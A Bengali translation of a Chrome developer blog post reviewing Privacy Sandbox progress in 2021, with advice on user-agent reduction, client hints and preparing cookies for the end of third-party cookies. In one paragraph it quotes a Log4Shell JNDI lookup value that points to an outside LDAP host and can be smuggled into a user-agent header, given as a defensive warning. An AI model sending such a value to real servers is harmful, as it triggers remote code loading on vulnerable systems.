গোপনীয়তা স্যান্ডবক্সে অগ্রগতি (ডিসেম্বর 2021)

গোপনীয়তা স্যান্ডবক্সে অগ্রগতির 2021 র্যাপ-আপ সংস্করণে স্বাগতম, Chrome-এ তৃতীয় পক্ষের কুকিগুলি পর্যায়ক্রমে বন্ধ করার পথে মাইলফলকগুলি ট্র্যাক করা এবং আরও ব্যক্তিগত ওয়েবের দিকে কাজ করা৷ সাধারণত, আমরা পুরো প্রকল্পের খবরের সাথে গোপনীয়তা স্যান্ডবক্স টাইমলাইনে আপডেটের একটি ওভারভিউ শেয়ার করি, কিন্তু ডিসেম্বর মাস ছিল শান্ত মাস। পরিবর্তে, আমরা 2021 সালের কিছু ক্রিয়াকলাপের দিকে ফিরে তাকাব এবং কিছু সম্ভাব্য রেজোলিউশন দেব যা আপনি এখন নতুন বছরে করতে পারেন।

ক্রোমিয়াম উন্নয়ন প্রক্রিয়া

একটি নতুন ওয়েব প্ল্যাটফর্ম বৈশিষ্ট্য Chromium-এ অবতরণের জন্য, এটিকে প্রকল্পের উন্মুক্ত বিকাশ প্রক্রিয়ার মধ্য দিয়ে যেতে হবে৷ 2021 সালে, গোপনীয়তা স্যান্ডবক্স দল তৈরি করেছে:

🥚 প্রোটোটাইপের উদ্দেশ্য 19
🧪 পরীক্ষা করার অভিপ্রায় 7
🚀 জাহাজের অভিপ্রায় 11
উৎস

প্রতিটি মাইলফলক বৃহত্তর ওয়েব ইকোসিস্টেমের অবদানের জন্য একটি আমন্ত্রণ।

প্রোটোটাইপের একটি অভিপ্রায় হল প্রথম চেকপয়েন্ট, যেখানে আমরা আলোচনা এবং প্রাথমিক পরীক্ষা-নিরীক্ষার আমন্ত্রণ জানাই। এর মানে হল একটি প্রস্তাব GitHub-এ উপলব্ধ হবে, যেখানে আপনি একটি সমস্যা তৈরি করে একটি প্রশ্ন জিজ্ঞাসা করতে পারেন বা W3C এবং IETF-এর মতো স্ট্যান্ডার্ড গ্রুপগুলিতে আলোচনা এবং উপস্থাপনায় যোগ দিতে পারেন । এখানে কোডিং শুরু হয়, যার মানে আপনি একটি বৈশিষ্ট্য পতাকার পিছনে বিকাশকারী পরীক্ষার জন্য প্রোটোটাইপ কার্যকারিতা উপলব্ধ করা আশা করতে পারেন। প্রাথমিক প্রতিক্রিয়া যাচাইকরণ এবং প্রস্তাবের পুনরাবৃত্তির জন্য গুরুত্বপূর্ণ।

আমরা যদি অরিজিন ট্রায়ালের জন্য অনুরোধ করতে চাই তাহলে পরীক্ষা করার উদ্দেশ্য হল একটি ঐচ্ছিক পদক্ষেপ৷ বিকাশকারীরা একটি বৈশিষ্ট্যের অরিজিন ট্রায়ালের জন্য সাইন আপ করতে পারেন , এবং তারপর এটি উত্পাদনে পরীক্ষা করতে পারেন ৷ এটিকে একটি পরীক্ষা বলা হয় কারণ আমাদের কাছে বৈশিষ্ট্যটির নির্দিষ্ট দিক রয়েছে যা আমরা বাস্তব-বিশ্বের পরিবেশে যাচাই করতে চাই৷ বিকাশকারীরা যারা এই পরীক্ষার ফলাফলগুলি পরীক্ষা করতে এবং ভাগ করে নিতে পারে তারা বৈশিষ্ট্যটিকে পুনরাবৃত্তি করতে এবং বিকশিত করতে সহায়তা করার জন্য মূল্যবান প্রতিক্রিয়া প্রদান করে।

একটি ইন্টেন্ট টু শিপ হল চূড়ান্ত মাইলফলক যা ইঙ্গিত দেয় যে একটি বৈশিষ্ট্য এখন সম্পূর্ণ এবং সাধারণ উপলব্ধতার জন্য প্রস্তুত৷ একবার অনুমোদিত হলে, বৈশিষ্ট্যটি একটি আসন্ন রিলিজে একত্রিত হয় এবং তারপর ক্যানারি, বিটা এবং স্থিতিশীল চ্যানেলগুলির মাধ্যমে অগ্রসর হয়৷ কোনও বৈশিষ্ট্য স্থিতিশীল হওয়ার আগে কোনও বাগ ধরতে এবং রিপোর্ট করার জন্য আপনি Chrome এর ক্যানারি এবং বিটা সংস্করণের সাথে আপনার সাইটগুলি পরীক্ষা করেছেন তা নিশ্চিত করা গুরুত্বপূর্ণ।

প্রস্তাব

প্রতিটি গোপনীয়তা স্যান্ডবক্স প্রস্তাবে একটি সহগামী GitHub সংগ্রহস্থল রয়েছে। একটি সংগ্রহস্থল সামগ্রিক কার্যকারিতা, ব্রাউজার দ্বারা বাস্তবায়নের জন্য একটি বিস্তারিত স্পেসিফিকেশন এবং সমস্যা এবং টান অনুরোধের আকারে ওয়েব ইকোসিস্টেম জুড়ে অবদানের জন্য একটি ব্যাখ্যাকারীকে হোস্ট করে।

14টি গোপনীয়তা স্যান্ডবক্স সংগ্রহস্থল জুড়ে, আমাদের ছিল:

💬 545 ইস্যু তৈরি হয়েছে
250 সমস্যা বন্ধ
🛠️ 261 টান অনুরোধ তৈরি করা হয়েছে
223 পুল রিকোয়েস্ট একত্রিত হয়েছে
উৎস

ব্যাখ্যাকারী এবং স্পেসিফিকেশনের ভাষাটি প্রায়শই মান এবং ব্রাউজার ডেভেলপমেন্টের সাথে পরিচিত এমন শ্রোতাদের জন্য লক্ষ্য করা হয়, যদি আপনি এটির সাথে অপরিচিত হন তবে এটি চ্যালেঞ্জিং হতে পারে। তবে একজন ব্যাখ্যাকারীর উদ্দেশ্য ব্যাখ্যা করা! যদি এমন কিছু পয়েন্ট থাকে যা অস্পষ্ট বা কভার না হয়, আমরা চাই আপনি একটি সমস্যা উত্থাপন করুন যাতে আমরা ব্যাখ্যাকারীকে আপডেট করতে এবং স্পষ্ট করতে পারি।

রেজুলেশন

ব্যবহারকারী-এজেন্ট বসন্ত পরিষ্কার

আমরা যখন নতুন বছর গণনা করছিলাম, আমরা Chrome 100 এবং ব্যবহারকারী-এজেন্ট স্ট্রিং-এর ক্রমবর্ধমান হ্রাস উভয় পর্যন্ত গণনা করছি৷ আপনার কোডে ব্যবহারকারী-এজেন্ট স্ট্রিং-এর যেকোনও ব্যবহার পুনরায় দেখার জন্য এটি এই পরিবর্তনগুলির যেকোনো একটি দ্বারা প্রভাবিত হয়েছে কিনা তা পরীক্ষা করার জন্য এটি একটি ভাল প্রেরণা৷

এই অঞ্চলগুলি খুঁজে পেতে:

  1. আপনার জাভাস্ক্রিপ্ট কোডে navigator.userAgent অনুসন্ধান করুন, অথবা আপনার সার্ভার কোডে User-Agent হেডারে অ্যাক্সেস করুন।
  2. 2 সংখ্যার সংস্করণ সম্পর্কে অনুমানের জন্য আপনার স্ট্রিংটির পার্সিং পরীক্ষা করুন। উদাহরণস্বরূপ, একটি রেজেক্স যা নির্দিষ্ট করে \d\d ​​বা \d{2} কে \d+ দিয়ে প্রতিস্থাপন করা উচিত।
  3. আপনি যেখানে নির্ভর করেন সেখানে আপনার স্ট্রিং ব্যবহার পরীক্ষা করুন:
    • প্ল্যাটফর্ম (অপারেটিং সিস্টেম) সংস্করণ
    • সম্পূর্ণ ক্রোম বিল্ড সংস্করণ
    • মোবাইল ডিভাইসের নাম
  4. এই মানগুলি ভবিষ্যতে নির্দিষ্ট স্ট্রিংগুলিতে হ্রাস করা হবে। আপনার যদি এই মানগুলিতে অ্যাক্সেসের প্রয়োজন হয়, ব্যবহারকারী-এজেন্ট ক্লায়েন্ট ইঙ্গিতগুলিতে স্থানান্তর করুন

উল্লেখ করার জন্য একটি ডিসেম্বরের আপডেট আছে—আপনি যদি ব্যবহারকারী-এজেন্ট ক্লায়েন্ট ইঙ্গিতগুলি গ্রহণ করেন, আমরা একটি <meta> ট্যাগের মাধ্যমে এইচটিএমএল-এর অন্যান্য উত্সগুলিতে ইঙ্গিতগুলি অর্পণ করতে সক্ষম করার জন্য ইন্টেন্টকে পাঠিয়েছি। উদাহরণ স্বরূপ:

<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">

আপনি যদি একটি উত্সাহী বসন্ত পরিষ্কারের মেজাজে থাকেন তবে আপনি সম্পূর্ণরূপে ব্যবহারকারী-এজেন্ট ব্যবহারের বিকল্পগুলিও বিবেচনা করতে পারেন। আপনি যদি মোবাইল ডিভাইস সনাক্ত করতে স্ট্রিং ব্যবহার করেন, তাহলে আপনি প্রতিক্রিয়াশীল ডিজাইনের সাথে এটি প্রতিস্থাপন করতে পারেন কিনা তা তদন্ত করুন। আপনি যদি বৈশিষ্ট্য সমর্থনের জন্য ব্রাউজারের নাম এবং সংস্করণ পরীক্ষা করছেন, তাহলে আপনি পরিবর্তে বৈশিষ্ট্য সনাক্তকরণ ব্যবহার করতে পারেন কিনা তা দেখুন।

এটি সর্বদা মনে রাখা মূল্যবান যে ব্যবহারকারী-এজেন্ট, যে কোনো ক্লায়েন্টের প্রদত্ত মূল্যের মতো, সঠিক বা এমনকি প্রদান করা নিশ্চিত নয়। সাম্প্রতিক Log4j দুর্বলতা, "Log4shell" এই ঝুঁকির একটি উদাহরণ প্রদান করে। ${jndi:ldap://example.com/file} এর মতো একটি মান অন্তর্ভুক্ত করার জন্য তার ব্যবহারকারী-এজেন্ট স্ট্রিং সেট করে এমন একটি ক্লায়েন্ট সার্ভারে সক্রিয়ভাবে পার্স করার জন্য একটি সাইট পেতে সক্ষম হতে পারে।

আরেকটি ঐতিহ্যগত নতুন বছরের ক্রিয়াকলাপ হল নিশ্চিত করা যে আপনি খুশি যে আপনার কাছে গুণমানের উপাদান সহ স্বাস্থ্যকর সংখ্যক কুকি রয়েছে। যেহেতু আমরা তৃতীয় পক্ষের কুকিজ থেকে বেরিয়ে আসার পর্যায়টির দিকে এগিয়ে যাচ্ছি, আপনার নিশ্চিত হওয়া উচিত যে আপনি জানেন যে আপনার সাইটের কোন কুকি প্রভাবিত হবে। 2020 একটি হেডস্টার্ট প্রদান করেছে কারণ এটি SameSite=None দিয়ে ক্রস-সাইট বা থার্ড-পার্টি ব্যবহারের জন্য সমস্ত কুকি চিহ্নিত করা প্রয়োজন।

যেকোন কুকি যেখানে আপনি SameSite অ্যাট্রিবিউটটি None সেট করেছেন তার একটি আপডেটের প্রয়োজন হবে।

এই মুহূর্তে বিবেচনা করার জন্য তিনটি সম্ভাব্য রুট রয়েছে:

  1. যদি কুকি শুধুমাত্র শীর্ষ-স্তরের সাইটের সাথে 1:1 সম্পর্কের প্রয়োজন হয়, তাহলে CHIPS প্রস্তাবের অগ্রগতি অনুসরণ করুন। এর অর্থ হবে কুকিতে Partitioned অ্যাট্রিবিউট যোগ করা।
  2. যদি কুকি একটি ক্রস-সাইট প্রসঙ্গে ব্যবহার করা হয়, কিন্তু শুধুমাত্র আপনার মালিকানাধীন এবং পরিচালনা করা সাইট জুড়ে, তাহলে এটি প্রথম-পক্ষের সেটগুলির জন্য প্রার্থী হতে পারে৷ এর জন্য সেটের সাইটগুলিকে সংজ্ঞায়িত করা এবং কুকিতে SameParty অ্যাট্রিবিউট যোগ করা প্রয়োজন৷
  3. যদি কুকিটি একাধিক সাইট জুড়ে শেয়ার করা মান প্রদানের জন্য ব্যবহার করা হয়, তাহলে ক্রস-সাইট ট্র্যাকিং-এর উপর নির্ভর করে না এমন বিকল্প সমাধানের জন্য গোপনীয়তা স্যান্ডবক্স প্রস্তাবগুলির বিস্তৃত সেটটি তদন্ত করুন।

আপনি যদি বিশেষ করে স্বাস্থ্য-সচেতন বোধ করেন, তবে আপনার কুকির সমস্ত ব্যবহার পুনরায় দেখার জন্য এটি একটি আদর্শ সময়, কারণ আপনার প্রথম পক্ষের কুকিগুলিকেও উন্নত করার জন্য আমাদের কাছে একটি ভাল রেসিপি রয়েছে৷

প্রতিক্রিয়া

যেহেতু আমরা এই মাসিক আপডেটগুলি প্রকাশ করতে থাকি, এবং সামগ্রিকভাবে গোপনীয়তা স্যান্ডবক্সের মাধ্যমে অগ্রগতি চালিয়ে যাচ্ছি, আমরা নিশ্চিত করতে চাই যে বিকাশকারীরা তাদের প্রয়োজনীয় তথ্য এবং সহায়তা পান। এই সিরিজে আমরা উন্নতি করতে পারি এমন কিছু থাকলে @ChromiumDev Twitter- এ আমাদের জানান। ফরম্যাটের উন্নতি চালিয়ে যেতে আমরা আপনার ইনপুট ব্যবহার করব।

গোপনীয়তা স্যান্ডবক্স FAQ দেখুন, যা আমরা বিকাশকারী সমর্থন রেপোতে আপনার জমা দেওয়া সমস্যার ভিত্তিতে প্রসারিত করতে থাকি। আপনার যদি কোনও প্রস্তাবের পরীক্ষা বা বাস্তবায়ন সম্পর্কে কোনও প্রশ্ন থাকে তবে সেখানে আমাদের সাথে কথা বলুন।